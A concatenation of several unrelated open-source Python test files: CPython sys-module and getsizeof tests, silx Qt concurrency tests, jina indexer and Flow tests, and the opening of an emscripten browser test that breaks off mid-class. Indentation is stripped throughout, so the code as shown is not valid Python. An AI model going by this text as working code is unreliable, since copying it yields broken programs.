self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
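# _testcapi.write_unraisable_exc() calls PyErr_WriteUnraisable() with the
# given message and object; return the arguments the unraisable hook is
# expected to receive so callers can compare them.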
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
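# struct.calcsize('P') is the platform pointer size in bytes; the expected
# sizes below are built from struct format strings in these units.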
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
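# Expected sizes are given as struct format strings ('P' = pointer,
# 'n' = Py_ssize_t, 'i' = int, ...); calcobjsize()/calcvobjsize() prepend
# the fixed PyObject / PyVarObject header to the packed size.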
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
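# A non-empty dict owns a separate PyDictKeysObject: a header ('2nP2n'),
# an index table (8 or 16 one-byte slots here) and 2/3 of that many
# entries of ('n2P') each (hash, key, value).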
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('4Pi2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('14P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
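# Mirror the C implementation's growth rule: the hash table is the
# smallest power of two greater than 2*len(sample); tables that still fit
# in the 8-slot smalltable add no separate allocation.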
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
test_async.py
|
# coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2018 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""Test of async module."""
from __future__ import absolute_import
__authors__ = ["T. Vincent"]
__license__ = "MIT"
__date__ = "09/03/2018"
import threading
import unittest
from concurrent.futures import wait
from silx.gui import qt
from silx.gui.utils.testutils import TestCaseQt
from silx.gui.utils import concurrent
class TestSubmitToQtThread(TestCaseQt):
"""Test submission of tasks to Qt main thread"""
def setUp(self):
# Reset executor to test lazy-loading in different conditions
concurrent._executor = None
super(TestSubmitToQtThread, self).setUp()
def _task(self, value1, value2):
return value1, value2
def _taskWithException(self, *args, **kwargs):
raise RuntimeError('task exception')
def testFromMainThread(self):
"""Call submitToQtMainThread from the main thread"""
value1, value2 = 0, 1
future = concurrent.submitToQtMainThread(self._task, value1, value2=value2)
self.assertTrue(future.done())
self.assertEqual(future.result(1), (value1, value2))
self.assertIsNone(future.exception(1))
future = concurrent.submitToQtMainThread(self._taskWithException)
self.assertTrue(future.done())
with self.assertRaises(RuntimeError):
future.result(1)
self.assertIsInstance(future.exception(1), RuntimeError)
def _threadedTest(self):
"""Function run in a thread for the tests"""
value1, value2 = 0, 1
future = concurrent.submitToQtMainThread(self._task, value1, value2=value2)
wait([future], 3)
self.assertTrue(future.done())
self.assertEqual(future.result(1), (value1, value2))
self.assertIsNone(future.exception(1))
future = concurrent.submitToQtMainThread(self._taskWithException)
wait([future], 3)
self.assertTrue(future.done())
with self.assertRaises(RuntimeError):
future.result(1)
self.assertIsInstance(future.exception(1), RuntimeError)
def testFromPythonThread(self):
"""Call submitToQtMainThread from a Python thread"""
thread = threading.Thread(target=self._threadedTest)
thread.start()
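# submitToQtMainThread() schedules work in the Qt main thread, so keep
# pumping the event loop here until the worker thread finishes.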
for i in range(100):  # poll for up to 10 seconds
self.qapp.processEvents()
thread.join(0.1)
if not thread.is_alive():
break
else:
self.fail('Thread task still running')
def testFromQtThread(self):
"""Call submitToQtMainThread from a Qt thread pool"""
class Runner(qt.QRunnable):
def __init__(self, fn):
super(Runner, self).__init__()
self._fn = fn
def run(self):
self._fn()
def autoDelete(self):
return True
threadPool = qt.silxGlobalThreadPool()
runner = Runner(self._threadedTest)
threadPool.start(runner)
for i in range(100):  # poll for up to 10 seconds
self.qapp.processEvents()
done = threadPool.waitForDone(100)
if done:
break
else:
self.fail('Thread pool task still running')
|
test_index.py
|
import os
import multiprocessing as mp
import pytest
import numpy as np
from jina.enums import FlowOptimizeLevel
from jina.executors.indexers.vector import NumpyIndexer
from jina.flow import Flow
from jina.parsers.flow import set_flow_parser
from jina.proto import jina_pb2
from jina import Document
from tests import random_docs
cur_dir = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope='function')
def test_workspace_index(tmpdir):
os.environ['JINA_TEST_INDEX'] = str(tmpdir)
workspace_path = os.environ['JINA_TEST_INDEX']
yield workspace_path
del os.environ['JINA_TEST_INDEX']
@pytest.fixture(scope='function')
def test_workspace_joint(tmpdir):
os.environ['JINA_TEST_JOINT'] = str(tmpdir)
workspace_path = os.environ['JINA_TEST_JOINT']
yield workspace_path
del os.environ['JINA_TEST_JOINT']
def get_result(resp):
n = []
for d in resp.search.docs:
n.append([k.id for k in d.matches])
n = np.array(n)
# each of the 2 query docs should return its top-50 matches
np.testing.assert_equal(n.shape[0], 2)
np.testing.assert_equal(n.shape[1], 50)
class DummyIndexer(NumpyIndexer):
# add() is overridden as a no-op so nothing is actually written to the index
def add(self, *args, **kwargs):
pass
class DummyIndexer2(NumpyIndexer):
# the add() function is simply copied from NumpyIndexer
def add(self, keys: 'np.ndarray', vectors: 'np.ndarray', *args, **kwargs):
if len(vectors.shape) != 2:
raise ValueError(f'vectors shape {vectors.shape} is not valid, expecting "vectors" to have rank of 2')
if not self.num_dim:
self.num_dim = vectors.shape[1]
self.dtype = vectors.dtype.name
elif self.num_dim != vectors.shape[1]:
raise ValueError(
"vectors' shape [%d, %d] does not match with indexers's dim: %d" %
(vectors.shape[0], vectors.shape[1], self.num_dim))
elif self.dtype != vectors.dtype.name:
raise TypeError(
f"vectors' dtype {vectors.dtype.name} does not match with indexers's dtype: {self.dtype}")
elif keys.shape[0] != vectors.shape[0]:
raise ValueError('number of keys %d does not equal the number of vectors %d' % (keys.shape[0], vectors.shape[0]))
elif self.key_dtype != keys.dtype.name:
raise TypeError(
f"keys' dtype {keys.dtype.name} does not match with indexers keys's dtype: {self.key_dtype}")
self.write_handler.write(vectors.tobytes())
self.key_bytes += keys.tobytes()
self.key_dtype = keys.dtype.name
self._size += keys.shape[0]
def test_doc_iters():
docs = random_docs(3, 5)
for doc in docs:
assert isinstance(doc, Document)
def test_simple_route():
f = Flow().add()
with f:
f.index(input_fn=random_docs(10))
def test_update_method(test_metas):
with DummyIndexer(index_filename='testa.bin', metas=test_metas) as indexer:
indexer.save()
assert not os.path.exists(indexer.save_abspath)
assert not os.path.exists(indexer.index_abspath)
indexer.add()
indexer.save()
assert os.path.exists(indexer.save_abspath)
assert os.path.exists(indexer.index_abspath)
with DummyIndexer2(index_filename='testb.bin', metas=test_metas) as indexer:
indexer.save()
assert not os.path.exists(indexer.save_abspath)
assert not os.path.exists(indexer.index_abspath)
indexer.add(np.array([1, 2, 3]), np.array([[1, 1, 1], [2, 2, 2]]))
indexer.save()
assert os.path.exists(indexer.save_abspath)
assert os.path.exists(indexer.index_abspath)
@pytest.mark.skipif('GITHUB_WORKFLOW' in os.environ, reason='skip the network test on github workflow')
def test_two_client_route_parallel():
fa1 = set_flow_parser().parse_args(['--optimize-level', str(FlowOptimizeLevel.NONE)])
f1 = Flow(fa1).add(parallel=3)
f2 = Flow(optimize_level=FlowOptimizeLevel.IGNORE_GATEWAY).add(parallel=3)
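# f1 turns flow optimization off entirely and f2 only skips the gateway
# optimization, so both flows keep their 3-way parallelism (6 peas each).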
def start_client(fl):
fl.index(input_fn=random_docs(10))
with f1:
assert f1.num_peas == 6
t1 = mp.Process(target=start_client, args=(f1,))
t1.daemon = True
t2 = mp.Process(target=start_client, args=(f1,))
t2.daemon = True
t1.start()
t2.start()
with f2:
# no optimization can be made because we ignored the gateway
assert f2.num_peas == 6
t1 = mp.Process(target=start_client, args=(f2,))
t1.daemon = True
t2 = mp.Process(target=start_client, args=(f2,))
t2.daemon = True
t1.start()
t2.start()
@pytest.mark.skipif('GITHUB_WORKFLOW' in os.environ, reason='skip the network test on github workflow')
def test_two_client_route():
def start_client(fl):
fl.index(input_fn=random_docs(10))
with Flow().add() as f:
t1 = mp.Process(target=start_client, args=(f,))
t1.daemon = True
t2 = mp.Process(target=start_client, args=(f,))
t2.daemon = True
t1.start()
t2.start()
def test_index(test_workspace_index):
f = Flow().add(uses=os.path.join(cur_dir, 'yaml/test-index.yml'), parallel=3, separated_workspace=True)
with f:
f.index(input_fn=random_docs(50))
for j in range(3):
assert os.path.exists(os.path.join(test_workspace_index, f'test2-{j + 1}/test2.bin'))
assert os.path.exists(os.path.join(test_workspace_index, f'test2-{j + 1}/tmp2'))
def test_compound_idx(test_workspace_joint, mocker):
def validate(req):
assert req.status.code < jina_pb2.StatusProto.ERROR
assert req.search.docs[0].matches[0].score.op_name == 'NumpyIndexer'
with Flow().add(uses=os.path.join(cur_dir, 'yaml/test-joint.yml')) as f:
f.index(random_docs(100, chunks_per_doc=0))
response_mock = mocker.Mock(wrap=validate)
with Flow().add(uses=os.path.join(cur_dir, 'yaml/test-joint.yml')) as g:
g.search(random_docs(10, chunks_per_doc=0), on_done=response_mock)
response_mock.assert_called()
|
test_browser.py
|
# coding=utf-8
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, get_browser
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import Popen, try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
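# Minimal handler that serves `data` either whole or, when
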